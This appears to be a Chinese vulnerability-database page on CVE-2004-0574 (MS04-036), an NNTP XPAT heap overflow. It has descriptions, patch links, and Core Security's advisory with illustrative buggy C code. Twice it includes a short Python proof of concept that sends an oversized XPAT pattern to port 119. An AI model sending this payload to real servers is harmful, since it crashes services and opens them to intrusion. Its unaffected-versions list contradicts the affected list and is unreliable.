CVE-2004-0574
CVSS10.0
发布时间 :2004-11-03 00:00:00
修订时间 :2016-10-17 22:46:13
NMCOEPS    

[原文]The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows.


[CNNVD]Microsoft NNTP XPAT命令远程缓冲区溢出漏洞(MS04-036)(CNNVD-200411-018)

        
        Microsoft NNTP组件是用于对新闻组服务器支持。
        Microsoft NNTP服务器对XPAT命令处理缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        XPAT命令用于接收指定文章中的特殊头字段信息,命令格式如下:
        XPAT header range| pat [pat...]
        问题存在于XPAT处理用户提供的ASCII值并转换为2字节字符存放到缓冲区中。NNTP服务分配4000字节缓冲区用于存储转换XPAT查询的2字节字符格式,它使用初始化设置为'2000'值的全局计数器跟踪缓冲区还剩下多少字节,由于对变量的比较缺少正确处理,可导致产生基于off-by-two的堆溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0::server
cpe:/a:microsoft:exchange_server:2000Microsoft exchange_srv 2000
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2003_server:r2
cpe:/a:microsoft:exchange_server:2003Microsoft exchange_srv 2003

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5926Windows 2000 NNTP Component Buffer Overflow
oval:org.mitre.oval:def:5070Windows NT NNTP Component Buffer Overflow
oval:org.mitre.oval:def:5021Vulnerability in NNTP Could Allow Remote Code Execution
oval:org.mitre.oval:def:4392Windows Server 2003 NNTP Component Buffer Overflow
oval:org.mitre.oval:def:246Network News Transfer Protocol Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0574
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0574
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-018
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109761632831563&w=2
(UNKNOWN)  BUGTRAQ  20041012 CORE-2004-0802: IIS NNTP Service XPAT Command Vulnerabilities
http://www.ciac.org/ciac/bulletins/p-012.shtml
(VENDOR_ADVISORY)  CIAC  P-012
http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10
(UNKNOWN)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10
http://www.kb.cert.org/vuls/id/203126
(VENDOR_ADVISORY)  CERT-VN  VU#203126
http://www.microsoft.com/technet/security/bulletin/ms04-036.asp
(VENDOR_ADVISORY)  MS  MS04-036
http://xforce.iss.net/xforce/xfdb/17641
(VENDOR_ADVISORY)  XF  win-nntp-bo(17641)
http://xforce.iss.net/xforce/xfdb/17661
(UNKNOWN)  XF  win-ms04036-patch(17661)

- 漏洞信息

Microsoft NNTP XPAT命令远程缓冲区溢出漏洞(MS04-036)
危急 边界条件错误
2004-11-03 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft NNTP组件是用于对新闻组服务器支持。
        Microsoft NNTP服务器对XPAT命令处理缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        XPAT命令用于接收指定文章中的特殊头字段信息,命令格式如下:
        XPAT header range| pat [pat...]
        问题存在于XPAT处理用户提供的ASCII值并转换为2字节字符存放到缓冲区中。NNTP服务分配4000字节缓冲区用于存储转换XPAT查询的2字节字符格式,它使用初始化设置为'2000'值的全局计数器跟踪缓冲区还剩下多少字节,由于对变量的比较缺少正确处理,可导致产生基于off-by-two的堆溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS04-036)以及相应补丁:
        MS04-036:Vulnerability in NNTP Could Allow Remote Code Execution (883935)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS04-036.mspx

        补丁下载:
        Microsoft Windows NT Server 4.0 Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=0126B7AC-9C78-45C5-8AC7-E0E8CA4B6DEE

        
        Microsoft Windows 2000 Server Service Pack 3 and Microsoft Windows 2000 Server Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=54A86560-4A0C-4E2F-A137-D8EE905A674A

        
        Microsoft Windows Server? 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=DCB1CB73-A426-40D8-BD14-B458C7915815

        
        Microsoft Windows Server 2003 64-Bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=1A8C4D7A-2F85-4CDD-8CC9-E2E1817403DF

- 漏洞信息 (578)

MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036) (EDBID:578)
windows dos
2004-10-16 Verified
0 Lucas Lavarello
N/A [点击下载]
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
#    Lucas Lavarello (lucas at coresecurity dot com)
#    Juliano Rizzo   (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import * 

host = "127.0.0.1"
pat = "C"*1946  + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)


# milw0rm.com [2004-10-16]
		

- 漏洞信息 (F34648)

Core Security Technologies Advisory 2004.0802 (PacketStormID:F34648)
2004-10-13 00:00:00
Core Security Technologies,Lucas Lavarello,Juliano Rizzo  coresecurity.com
advisory,arbitrary,tcp,vulnerability,protocol
CVE-2004-0574
[点击下载]

Core Security Technologies Advisory ID: CORE-2004-0802 - Microsoft IIS provides organizations using it with the ability to service and route news using the Network News Transfer Protocol (NNTP) with the Microsoft NNTP service listening on port 119/tcp, and optionally on port 563/tcp for SSL encrypted connections. Multiple vulnerabilities were found in Microsoft IIS that could allow an attacker to execute arbitrary commands on vulnerable systems running the Microsoft IIS NNTP service.

Core Security Technologies Advisory
                     http://www.coresecurity.com

            IIS NNTP Service XPAT Command Vulnerabilities



Date Published: 2004-10-12

Last Update: 2004-10-12

Advisory ID: CORE-2004-0802

Bugtraq ID: Not assigned

CVE Name: CAN-2004-0574

Title: IIS NNTP Service XPAT Command Vulnerabilities

Class: Boundary error condition

Remotely Exploitable: Yes

Locally Exploitable: Yes

Advisory URL:
 http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10

Vendors contacted:
- Microsoft
  . 2004-08-16 Core Security Technologies sent draft advisory to vendor
  . 2004-08-16 Microsoft MSRC acknowledgement received
  . 2004-10-12 Microsoft releases a fix (MS04-036)
 
Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

 Microsoft IIS provides organizations using it with the ability to
 service and route news using the Network News Transfer Protocol (NNTP)
 with the Microsoft NNTP service listening on port 119/tcp, and
 optionally on port 563/tcp for SSL encrypted connections.

 Multiple vulnerabilities were found in Microsoft IIS that could allow
 an attacker to execute arbitrary commands on vulnerable systems
 running the Microsoft IIS NNTP service.

 The Network News Transfer Protocol (NNTP) is fully described in
 RFC 977 [1]:
 "NNTP specifies a protocol for the distribution, inquiry, retrieval,
 and posting of news articles using a reliable stream-based
 transmission of news among Not assignedthe ARPA-Internet community.
 NNTP is designed so that news articles are stored in a central database
 allowing a subscriber to select only those items he wishes to read.
 Indexing, cross-referencing, and expiration of aged messages are also
 provided".

*Vulnerable Packages:*

. Microsoft Windows NT Server 4.0 Service Pack 6a NNTP component
. Microsoft Windows 2000 Server Service Pack 3 NNTP component
  and Microsoft Windows 2000 Server Service Pack 4 NNTP component
. Microsoft Windows Server 2003 NNTP Component
. Microsoft Windows Server 2003 64-Bit Edition NNTP Component

*Solution/Vendor Information/Workaround:*

 A fix for the vulnerabilities reported in this advisory is available
 as a Microsoft Security update at:
 http://www.microsoft.com/technet/security/bulletin/MS04-036.mspx

 A workaround is to disable the NNTP service. This will prevent attackers
 from exploiting the discovered vulnerabilities but will also make the
 NNTP services unavailable for legitimate users.

*Credits:*

 These vulnerabilities were found by Lucas Lavarello and Juliano Rizzo
 from Core Security Technologies.

*Technical Description - Exploit/Concept Code:*

 The Network News Transfer Protocol supports a number of different
 extensions. Extensions are described in RFC 2980 [2].
 
 This advisory is focused on the XPAT command.
 "The XPAT command is used to retrieve specific headers from specific
 articles, based on pattern matching on the contents of the header".

 The syntax of the XPAT command is:
 XPAT header range|<message-id> pat [pat...]

 The XPAT command doesn't require previous user authentication and
 hence we believe this should be considered a high risk vulnerability.
 
 The vulnerabilities were found in the parser and query translator of
 the XPAT command  within the Network News Transfer Protocol service.

 The NNTP service translates calls to the XPAT command into an internal
 query format. As stated in its calling syntax, it accepts multiple
 patterns. Patterns as well as other parameters are delimited by tab
 and space characters.

 The vulnerabilities found reside in the methods that take care of
 parsing user-supplied ASCII values and append them translated to
 2-byte characters, as part of an internal query buffer.

 For better understanding, we have created example versions of the
 vulnerable methods that contain vulnerabilities.
 When compiled, these methods may not match  exactly their original
 versions, but are meant to be taken as illustrative examples.

 The NNTP service allocates a 4000 bytes buffer that it uses to store
 the translated XPAT query to a 2-byte character format. It keeps track
 of how many words are left in the buffer using a global counter
 initially set to the value of '2000'. A pointer to the buffer as well
 as a pointer to the counter are used in every call to the vulnerable
 string-appending methods which take care of updating those values for
 any future calls.

 The methods differ if called for user-supplied pattern data or internal
 query language keywords. In both cases, incorrect bounds checking is
 performed, leading to off-by-two, off-by-four and heap overflow
 vulnerabilities.

 The following example demonstrates the miscalculations made in the
 method used to append internal query language keywords to the global
 destination buffer.

----------------------------------------------------------------------
// The wstringappendkeywords function.
//  input:
//    pdestbuf - a pointer to pointer to a wchar destination buffer
//    srcbuf - a pointer to a char source buffer
//    spaceleft - a pointer to an integer with the amount of bytes left
//
//  output:
//    pdestbuf - the pointer to pointer is updated to point after
//               the copied bytes
//    spaceleft - the integer is updated substracting the amount of
//                copied bytes.
//
//  returns:
//    1 on OK
//    0 on FAIL - if there isn't enough space in the destination buffer

int wstringappendkeyword (short **pdestbuf, char *srcbuf, unsigned int 
*spaceleft)
{
unsigned int count = 0;
short *destbuf = *pdestbuf;

    if (srcbuf[count] != 0x00) {

        do {
            if (count > *spaceleft) {
                //...
                //not_enough_space handling code
                //...
                return 0;
            }

            destbuf[count] = (short)srcbuf[count];            
            count++;

        } while(srcbuf[count] != 0x00);
    }

    *spaceleft -= count;
    *pdestbuf += count;

    return 1;
}
----------------------------------------------------------------------

 As seen above, the function is checking 'count' to be only bigger than
 the amount of words left in the destination buffer. In the case of
 count being equal to the value pointed by the 'spaceleft' variable,
 2 bytes would be written past the end of destbuf's buffer.

 In its last iteration, the loop will check 'count' to be bigger than the
 amount of words and fail, aborting the whole call to the command.

 By passing a specific amount of bytes in the 'srcbuf' buffer, an
 attacker could break free from the copyloop before the 'spaceleft'
 check is done; decrementing the 'spaceleft' variable. Subtracting one
 from zero causes an unsigned integer variable to wrap under to
 0xFFFFFFFF, bypassing the existing defective bounds check. This way,
 any further attempts to copy data into the internal query buffer using
 this function will lead into a controllable heap overflow.

 The only barrier for exploitation is that this function is only called
 for appending hardcoded query language keywords to the buffer. This is
 where the next vulnerable method takes place.

 The rest of the vulnerabilities reside in the method used for translating
 and appending user-supplied patterns. The situation is similar to
 the one shown above except that the 'srcbuf' pointer holds data that is
 100% controllable by an  attacker  and that it's called sequentially
 for each supplied pattern.

 You will also notice this procedure permits an attacker to overwrite
 4 bytes past the end of 'destbuf' buffer introducing an off-by-four
 vulnerability.

----------------------------------------------------------------------
// The wstringappendpatterns function.
//  input:
//    pdestbuf - a pointer to pointer to a wchar destination buffer
//    srcbuf - a pointer to a char source buffer
//    spaceleft - a pointer to an integer with the amount of bytes left
//
//  output:
//    pdestbuf - the pointer to pointer is updated to point after the
//               copied bytes
//    spaceleft - the integer is updated substracting the amount of
//                copied bytes.
//
//  returns:
//    1 on OK
//    0 on FAIL - if there isn't enough space in the destination buffer


int wstringappendpatterns (short **pdestbuf, char *srcbuf, unsigned int 
*spaceleft)
{
unsigned int count = 0;
short *destbuf = *pdestbuf;

    while (srcbuf[count] != 0x00) {
    
        if (count > *spaceleft) {
            //...
            //not_enough_space handling code
            //...
            return 0;
        }


        if (srcbuf[count] == '[') {
            destbuf[count] = (short)'|';
            count++;
            destbuf[count] = (short)'[';

        } else {
            destbuf[count] = (short)srcbuf[count];
        }

        count++;
    }

    *spaceleft -= count;
    *pdestbuf += count;

    return 1;
}
----------------------------------------------------------------------

 Once again, having decremented spaceleft 'count' times, an attacker
 could make the value of the global remaining-words counter wrap under
 to 0xFFFFFFFF or 0xFFFFFFFE. By crafting multiple patterns of a
 specific length, an attacker could cause a controllable Heap overflow.

 The following proof-of-concept code written in Python demostrates the
 problems.

----------------------------------------------------------------------
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
#   Lucas Lavarello (lucas at coresecurity dot com)
#   Juliano Rizzo   (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# http://www.coresecurity.com
#--

from socket import *

host = "127.0.0.1"
pat = "C"*1946  + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)
----------------------------------------------------------------------

*References*

 [1] RFC 977: Network News Transfer Protocol
     http://www.faqs.org/rfcs/rfc977.html

 [2] RFC 2980: Common NNTP Extensions
     http://www.faqs.org/rfcs/rfc2980.html

*About Core Security Technologies*

 Core Security Technologies develops strategic security solutions for
 Fortune 1000 corporations, government agencies and military
 organizations. The company offers information security software and
 services designed to assess risk and protect and manage information
 assets.
 Headquartered in Boston, MA, Core Security Technologies can be reached
 at 617-399-6980 or on the Web at http://www.coresecurity.com.

 To learn more about CORE IMPACT, the first comprehensive penetration
 testing product, visit:
 http://www.coresecurity.com/products/coreimpact

*DISCLAIMER:*

 The contents of this advisory are copyright (c) 2004 CORE Security
 Technologies and may be distributed freely provided that no fee is
 charged for this distribution and proper credit is given.

$Id: iis-nntp-advisory.txt,v 1.7 2004/10/12 18:33:16 carlos Exp $

    

- 漏洞信息

10697
Microsoft Windows/Exchange NNTP Component Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in Windows and Exchange. The NNTP server fails to validate user-supplied data passed as a parameter to the XPAT command resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-10-12 2004-08-16
2004-10-12 2004-10-12

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft NNTP Component Heap Overflow Vulnerability
Boundary Condition Error 11379
Yes No
2004-10-12 12:00:00 2009-07-12 07:06:00
Discovery is credited to Lucas Lavarello and Juliano Rizzo from Core Security Technologies.

- 受影响的程序版本

Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Exchange Server 2003 SP1
Microsoft Exchange Server 2003
Microsoft Exchange Server 2000 SP3
Microsoft Exchange Server 2000 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers
Microsoft Exchange Server 5.5 SP4
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP3
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP2
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP1
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0

- 不受影响的程序版本

Microsoft Exchange Server 5.5 SP4
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP3
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP2
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP1
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
